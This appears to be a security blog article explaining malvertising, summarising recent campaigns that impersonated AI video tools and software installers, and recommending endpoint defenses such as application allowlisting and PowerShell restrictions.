Malicious online ads, or malvertising, have become one of the easiest ways for cybercriminals to break into systems, no hacking required. By exploiting legitimate advertising networks, attackers can deliver malware to unsuspecting users, often without any direct interaction.

Earlier this year, Microsoft Threat Intelligence uncovered a large-scale malvertising campaign that compromised nearly one million devices globally. The attackers used malicious advertisements to redirect users from illegal streaming sites to GitHub-hosted malware, demonstrating how malvertising can exploit trusted platforms to deliver malicious payloads without direct user interaction.

While many of these attacks are aimed at consumers, the consequences often spill into corporate environments. Employees may encounter malicious ads while using work devices for personal browsing or while performing work-related duties. Once malware reaches a company endpoint, it can hijack browser sessions, steal credentials, or deploy payloads that move laterally through the network. For businesses, the entry point may look like a harmless ad — but the fallout can be anything but.

How malvertising works

Malvertising embeds malicious code in online advertisements, which are then distributed through legitimate ad networks. These ads may appear on trusted, high-traffic websites, giving them the appearance of legitimacy.

Once loaded, the ad may silently redirect the user to a malicious site or initiate code execution in the browser. In some cases, no click is necessary — malware is delivered based solely on how the ad loads and fingerprints the user’s device.

Malvertising techniques used in recent campaigns

Recent campaigns show how threat actors continue to refine their methods and how damaging that can be for not just consumers, but businesses.

Fake AI video generators: In May 2025, Mandiant reported that a threat group tracked as UNC6032 launched a malvertising campaign impersonating popular AI video tools like Luma AI and Canva Dream Lab. The attackers created counterfeit websites promoted through Facebook and LinkedIn ads, enticing users to download malware disguised as AI-powered video editors. These malicious downloads deployed Python-based infostealers and backdoors, compromising users' systems and exfiltrating sensitive data.  

Hijacked social accounts: At the beginning of this year, Check Point Research reported that cybercriminals hijacked verified Facebook pages, rebranded them as AI photo apps like Kling AI, a popular AI-powered image and video synthesis tool, and ran paid ad campaigns that lured users to malware downloads disguised as image editors.

Fake software installers: Last year, attackers placed malicious ads posing as downloads for popular tools like WinSCP, PuTTY, and OBS Studio. Victims who clicked were led to counterfeit sites that served ransomware or info-stealers such as RedLine and IcedID.

The brands cybercriminals hid behind in these attacks, Meta, Luma AI, Canva Dream Lab, Kling AI, WinSCP, PuTTY, and OBS Studio, were not directly compromised, but the fallout still affects them.

When attackers use brand names to distribute malware, it can erode public trust, damage reputations, and burden legitimate developers with support issues and misinformation. Platforms like Google, Facebook, and LinkedIn may also face criticism for enabling malicious ads that appear alongside or even above legitimate listings.  

As these campaigns become more sophisticated, the reputational and financial risks extend well beyond individual victims to the brands being impersonated, and the platforms that unknowingly help deliver the bait.

Why traditional defenses fail

Common endpoint security tools often miss these attacks due to how they operate. Many malvertising payloads are fileless, running in memory using PowerShell or JavaScript, and evading antivirus software that only scans files at rest.

Other failures include:

• DNS filters that allow traffic from trusted services like Firebase or Cloudflare

• MFA bypass via session hijacking — no login is triggered, so no secondary challenge is presented

• Ad platform review systems that fail to detect redirect swaps after campaign approval

How to strengthen endpoint defense

A proactive, execution-focused defense model to stop malvertising at the endpoint level is the best approach to take.  

For organizations, the real risk isn’t just that employees might click on a bad ad, it’s that a single lapse in execution control can open the door to credential theft, ransomware, or network compromise. Malvertising bypasses perimeter defenses by preying on human behavior and abusing trusted infrastructure, leaving endpoint security as the last, and most critical, line of defense.

Implementing a default-deny posture at the endpoint level ensures that even if users are exposed to malicious ads, payloads can’t run, privileges can’t escalate, and lateral movement is stopped in its tracks. In today’s threat landscape, businesses can no longer afford to rely on reactive tools alone. Proactive, policy-driven controls are essential to shutting down threats before they ever gain a foothold.

Key tactics include:

• Application Allowlisting to block all but approved software from launching

• Ringfencing and script control to limit what apps and scripts can do or access

• PowerShell restrictions to prevent clipboard-executed attacks like ClickFix

• Real-time auditing for visibility into command-line behavior and privilege escalations

Training users to avoid suspicious ads and verifying the legitimacy of download sources are also critical components of a defense-in-depth strategy.

‍